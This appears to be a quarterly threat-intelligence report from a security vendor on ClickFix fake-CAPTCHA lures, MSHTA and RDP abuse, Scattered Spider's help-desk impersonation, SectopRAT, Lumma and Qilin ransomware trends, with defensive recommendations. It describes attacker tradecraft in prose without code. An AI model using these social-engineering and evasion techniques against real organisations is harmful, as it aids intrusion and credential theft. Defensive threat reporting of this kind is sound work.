Key Points

“ClickFix” tactics have fueled the surge in malware like “Lumma” and “SectopRAT,” using trusted tools like MSHTA to bypass defenses and deliver payloads.

Social engineering tactics like IT help-desk impersonation has pushed RDP ahead of internal spearphishing as the top initial access method.

Following the shutdown of “RansomHub,” affiliates have migrated to “Qilin,” driving an explosive 148% jump in activity.

“Scattered Spider” has returned to the ransomware game, combining social engineering, cloud persistence, and on-premises exploitation to target high-value users like CFOs, leveraging tools like RDP and Secure Shell (SSH) for stealthy attacks.

In our latest quarterly analysis (March–May 2025, the “reporting period”), ReliaQuest analyzed new and prevalent attacker techniques, malware trends, and ransomware group activity. These findings reveal how adversaries are refining their tactics, techniques, and procedures (TTPs); adapting to defenses; and exploiting vulnerabilities to infiltrate organizations.

This report examines emerging patterns through real-world attack methods, highlighting how attackers leverage trusted tools and target human weaknesses to achieve their goals. With insights relevant across industries, it provides actionable recommendations to help organizations strengthen defenses, anticipate threats, and stay ahead of increasingly sophisticated adversaries.

One standout trend this quarter is the widespread use of ClickFix—a social engineering technique that tricks users into pasting malicious commands into tools like PowerShell or the Windows Run prompt. Disguised as a “solution” to issues like fake CAPTCHAs or Windows updates, ClickFix preys on user trust and curiosity, enabling attackers to deliver malware and gain initial access with alarming ease.

As you read on, you’ll find actionable strategies to counter tactics like ClickFix, stay ahead of the latest attack trends, and build resilience in today’s evolving threat environment.

Top Tactics Targeting Enterprise Environments

In this section, we examine select MITRE tactics and techniques to reveal emerging attacker trends and the factors fueling their popularity.

Social Engineering Powers the First Step in Attacks

Figure 1: Top MITRE ATT&CK initial access techniques in true-positive incidents (% of total) during reporting period

Phishing-based tactics accounted for over half of initial access customer incidents, while drive-by compromises rose by 10% compared to the previous reporting period. Social engineering played a pivotal role in the success of these top tactics.

Techniques like ClickFix (see case study below) were central to drive-by downloads, typically delivered via phishing. Widely available phishing kits—pre-made tools that enable convincing phishing attacks—have drastically lowered the barrier to entry for attackers, allowing them to scale mass email delivery effortlessly. This ease of use ensures phishing remains among the top tactics time and time again.

External remote resources dropped from third to fourth place as attackers increasingly exploit user mistakes rather than technical vulnerabilities. This shift is likely driven by the simplicity, success rate, and universal applicability of social engineering campaigns like ClickFix.

For defenders, the rise in social engineering highlights the importance of addressing the human element in cybersecurity. Attackers are using trust, curiosity, and a lack of awareness to their advantage. To counter these threats, organizations must prioritize user education, implement phishing-resistant authentication methods, and deploy robust email security solutions to reduce risk effectively.

In May 2025, ReliaQuest identified a new ClickFix campaign that involved a fraudulent CAPTCHA to deceive users into executing a malicious PowerShell command. The fake CAPTCHA prompt encouraged users to copy and run obfuscated PowerShell commands, bypassing browser protections. These commands redirected users to a scareware page designed to mimic a Windows Defender alert, complete with a fake antivirus scan and a fraudulent Microsoft support number.

The organization’s endpoint detection and response (EDR) tool successfully blocked the malicious command, preventing the attackers from establishing remote access. Swift detection and response disrupted the attack chain before any further compromise could occur.

MSHTA’s Role in 33% of Defense Evasion Attacks

Figure 2: Top MITRE ATT&CK defense evasion techniques in true-positive incidents (% of total) during reporting period

Proxy execution with MSHTA, a native Windows binary for running HTML application files, has surged in popularity, rising from 3.1% a year ago to 33% of defense evasion incidents during this reporting period.

Threat actors take advantage of this legitimate tool by convincing users to copy and paste malicious commands into a terminal and pressing enter. MSHTA allows attackers to bypass traditional security controls designed to detect file-based delivery methods, such as phishing.

In the previous reporting period, the rise in MSHTA abuse was largely attributed to “ClearFake,” a JavaScript framework that used deceptive CAPTCHAs to convince users to execute malicious MSHTA commands.

ClearFake’s early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defense evasion tactics. Recently, other ClickFix adopters have fueled MSHTA’s current surge, leveraging broader social engineering tactics to bypass defenses more effectively.

Meanwhile, file deletion has rapidly gained momentum, climbing from eighth to third place in just one year. Once mainly used to cover tracks, this tactic now serves as a method for persistence and control. By removing key files, attackers can disable forensic investigations, disrupt incident response efforts, and ensure their presence remains hidden. This approach not only buys attackers more time to exfiltrate sensitive data but also prevents credential rotations, allowing them to maintain access and even resell compromised environments to other threat actors.

This shift in attacker behavior reflects a wider trend of using trusted system binaries and advanced evasion tactics. As such, organizations must adopt robust detection strategies to identify the misuse of legitimate tools to prevent attackers from operating undetected.

RDP Emerges as the Top Choice for Lateral Movement

Figure 3: Top MITRE ATT&CK lateral movement techniques in true-positive incidents (% of total) during reporting period

Originally designed as a legitimate tool for IT teams to provide remote support, RDP’s widespread presence on Windows systems has made it the go-to method for attackers. This trend is almost certainly linked to the rise of the Microsoft Teams social engineering tactic, where attackers impersonate IT help desks and persuade users to download RDP tools to connect remotely to their host.

The shift away from tactics like internal spearphishing suggests attackers are favoring techniques that require less user interaction and offer more direct access to internal systems. RDP provides predictable, stealthy access, especially when paired with stolen or purchased credentials.

The growing use of RDP as an attack vector highlights a critical vulnerability: the combination of human error and reliance on remote access tools. To mitigate these risks, businesses must prioritize employee training, enforce strict access controls, and monitor remote access activity to prevent breaches and data exposure.

Step Up Your Defenses

  • Disable Windows Run Prompt: Restrict access to the Windows Run prompt for non-administrative users to prevent attackers from using it to execute malicious commands, including those seen in ClickFix campaigns.

  • Prevent Unauthorized RDP Tools: Enforce application control policies to prevent the installation or execution of unauthorized RDP tools like QuickAssist.

  • Strengthen Defenses Against Drive-By Compromise: Implement web filtering solutions to block access to malicious websites used in drive-by compromise attacks. Regularly update and patch web browsers, plugins, and software to minimize vulnerabilities. Train staff to recognize and avoid suspicious links or pop-ups, and enforce policies that restrict the use of outdated or unsupported software that attackers often exploit.

ReliaQuest Investigates: Scattered Spider’s Comeback

After a five-month hiatus, Scattered Spider reemerged in April 2025, linked to a series of attacks on UK retail organizations. While the “DragonForce” ransomware group claimed responsibility, it’s believed that Scattered Spider facilitated initial access for these incidents, highly likely signaling a strategic partnership to regain momentum.

Our research into the group’s recent TTPs helps organizations understand how to protect themselves from becoming Scattered Spider’s next target.

Precision Targeting Through Social Engineering

Scattered Spider relies on carefully orchestrated social engineering to compromise organizations. CFOs are a primary focus, with attackers gathering personal and professional data online to convincingly impersonate them. In some cases, the group has exploited forgotten username portals to collect additional details, allowing them to manipulate help-desk and IT teams into resetting credentials and bypassing multifactor authentication (MFA). This meticulous preparation makes Scattered Spider’s methods alarmingly effective, allowing the group to infiltrate systems and escalate privileges with ease.

Figure 4: Example forgotten username portal used by Scattered Spider

Stealth Tactics to Operate Undetected

Inside enterprise environments, Scattered Spider gathers intelligence by accessing SharePoint documents while deleting key email indicators, such as MFA reset notifications and new device alerts, to conceal its activity. By operating stealthily for extended periods, the group significantly increases its chances of success.

On-Premises Exploitation Through Virtualization

Scattered Spider employs advanced on-premises techniques like RDP and Secure Shell (SSH) protocols for lateral movement. It also leverages virtualization platforms like Azure and ESXi virtual machines (VMs) to evade traditional defenses and flexibly execute attacks. These tactics enable the group to blend malicious activity into legitimate processes, making detection by conventional security measures far more difficult.

Scattered Spider’s success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack.

To counter these threats, organizations must prioritize enhanced identity verification, behavioral detection, and monitoring for unusual activity across both cloud and on-premises environments. Additionally, conducting external risk assessments for VIP information, such as executive profiles and publicly available data, can help identify vulnerabilities that attackers may exploit. These insights can inform the protection of company accessibility systems, reducing the risk of targeted attacks by groups like Scattered Spider.

Step Up Your Defenses

  • Implement ESXi Smart-Card Authentication: If credentials or MFA are compromised, replace VSphere authentication with smart card and PIN access to restrict ESXi environment entry.

  • Strengthen Social Engineering Defenses: Introduce video calls with ID verification and verified phone number callbacks for multistep verification; and conduct regular testing and employee training to help detect and deter attacks.

  • Restrict SharePoint Permissions: Limit access to sensitive files in SharePoint to only essential personnel, reducing the risk of attackers exploiting compromised accounts to access critical information.

ClickFix Fuels the Rise of SectopRAT Malware

Figure 5: Top three malware in true-positive incidents (% of total) during reporting period

Activity involving "SectopRAT," a .NET-based remote access trojan (RAT), spiked during this reporting period, fueled by two highly effective campaigns. Attackers leveraged ClickFix and a malvertising campaign using fake Google ads to distribute malicious Google Chrome installers hiding the malware. Both methods allowed attackers to exfiltrate credentials and establish backdoors for further exploitation, making SectopRAT a rising threat.

While SectopRAT has gained prominence due to its high success rates and innovative delivery techniques, previous heavy hitters—ClearFake and SocGholish—have fallen behind. However, this shift likely reflects the greater effectiveness of newer campaigns leveraging advanced tactics, rather than a slowdown in activity.

Lumma’s Resilience After Takedown

In May 2025, law enforcement dismantled “Lumma’s” infrastructure, suspending and blocking around 2,300 malicious domains. Despite this, Lumma’s operations remain active: Developers claim their systems are still functional, automated Telegram posts continue to advertise new logs for sale, and listings for Lumma logs on “Russian Market,” a popular cybercriminal marketplace, are regularly updated.

Although Lumma’s activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it’s likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool.

Step Up Your Defenses

  • Disable Password Saving in Browsers: Enforce policies to prevent storing passwords in web browsers, as infostealers often target browser-stored credentials. Conduct regular compliance audits to ensure this measure is consistently applied.

  • Reduce Session Cookie Timeouts: Set shorter session cookie timeouts to minimize the risk of session hijacking. This reduces an attacker’s access window and improves security by requiring more frequent re-authentication.

  • Log PowerShell Events: Use Group Policy to enable PowerShell logging, including script block logging and transcription. This helps detect malicious PowerShell commands from copy-paste malware.

Qilin Surges 148% Amid Ransomware Shakeup

Figure 6: Number of organizations listed on ransomware data-leak sites, by site, during reporting period

The ransomware landscape has been unusually chaotic, with major groups like “RansomHub” disbanding and others being absorbed. During this reporting period, Qilin’s activity skyrocketed by 148%, while "Play” and “Safepay” saw increases of 116% and 266%, respectively. These spikes are likely tied to RansomHub’s shutdown on April 1, 2025, as former affiliates likely migrated to other ransomware-as-a-service (RaaS) platforms, including Qilin.

This trend reflects a broader shift: While the number of active ransomware groups has dropped by nearly 30%, their affiliates are joining emerging or established RaaS platforms. These affiliates bring experience and expertise, fueling the growth of newer RaaS platforms.

With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalize on the influx of affiliates searching for new platforms. To attract this talent, we’ll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders.

Figure 7: Organizations listed on ransomware data-leak sites, by sector, during the reporting period

Ransomware victim data reveals notable changes this reporting period, with construction emerging as the only sector to experience an increase in attacks—rising by 15%. This surge likely reflects opportunistic targeting rather than a strategic shift, as attackers exploit the construction industry’s weaker cyber defenses. The sector's growing reliance on interconnected operational technology systems, such as project management tools, supply-chain coordination, and on-site equipment monitoring, creates vulnerabilities that adversaries can leverage to disrupt workflows. Construction organizations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets.

In contrast, the retail trade sector saw a 62% drop in victim count, returning to usual targeting levels. This sharp decline follows an unusual surge in the previous reporting period, driven almost entirely by the “CL0P” ransomware Cleo campaign, which disproportionately targeted retail trade organizations for their vast customer data and payment systems. With the Cleo campaign no longer active, attackers appear to have shifted their attention, reinforcing the opportunistic nature of ransomware operations.

For defenders, the rise in construction targeting highlights the urgent need to address the industry’s low cybersecurity maturity. Strengthening defenses, securing operational technologies, and implementing robust incident response plans are critical to minimizing future risks. This trend is a reminder that adversaries will continue to prey on industries they perceive as easier targets.

Step Up Your Defenses

  • Restrict External Communication: Disable external chats in Microsoft Teams to block phishing attempts from outside attackers. For essential external communication, use an allowlist to restrict interactions to trusted domains only.

  • Use Risk-Based Authentication: Adjust access requirements dynamically based on user behavior, device, and location. Flag unusual activity, such as logins from unfamiliar locations, to stop breaches early.

  • Protect Against AiTM Phishing: Secure high-risk accounts with Fast IDentity Online (FIDO), which resists adversary-in-the-middle (AiTM) attacks. Train employees to recognize phishing attempts from both internal and external sources.

Key Takeaways and What’s Next

The ransomware landscape is undergoing a significant transformation as affiliates migrate from disbanded groups like RansomHub to emerging RaaS platforms like Qilin, Play, and Safepay. This shift is reshaping the ecosystem, with Qilin alone seeing a staggering 148% surge in activity over the past three months. As RaaS operators compete to attract affiliates with new capabilities and revised profit-sharing models, we can expect this trend to continue.

ClickFix has emerged as a game-changing initial access technique, capitalizing on social engineering to exploit user trust and bypass defenses. By enabling attackers to deliver payloads through trusted tools like PowerShell and Windows Run, ClickFix is driving the success of campaigns like SectopRAT.

These developments signal a critical need for organizations to strengthen defenses, restrict access to trusted tools, and enhance user awareness to counter the growing sophistication of attackers. Looking ahead, three key threats stand out:

ClickFix’s Expansion Among Ransomware Groups: ClickFix’s ability to evade detection by using trusted tools like MSHTA makes it a highly appealing technique for ransomware operators. Currently used in malware campaigns, ClickFix has proven highly effective at bypassing traditional defenses such as email filters and endpoint protection. Given its success, we anticipate that 30% of RaaS affiliates will integrate this technique in the short term, streamlining operations and scaling their campaigns.

Scattered Spider’s Growing Web: Scattered Spider remains a formidable threat, using stolen personal data and precise social engineering to bypass MFA and compromise high-value targets like CFOs. Looking forward, the group is likely to embrace technologies like deepfakes, using AI-generated voice and video to convincingly impersonate trusted individuals. This evolution would amplify risks across industries, broaden their target base, and make detection even more challenging.

Acreed Steps Up to the Plate: Our analysis of Russian Market logs shows that “Acreed” infostealing malware is rapidly gaining traction. By Q1 2025, Acreed had surpassed more established infostealers, ranking second only to Lumma and cementing itself as a major threat. Its ability to provide unique insights into the permissions of compromised users may allow attackers to sell these accounts at higher prices on criminal marketplaces like Russian Market, making it an attractive option for threat actors. As Lumma affiliates transition to new malware-as-a-service (MaaS) platforms, it’s highly likely Acreed will continue to grow in popularity.

As attackers refine their strategies, the pressure on defenders will only grow. To stay ahead in this shifting landscape, organizations must act on the recommendations in this report, including deploying advanced detection capabilities, improving user education, and securing both cloud and on-premises environments. Proactive measures like these are critical to countering the growing sophistication of today’s threats.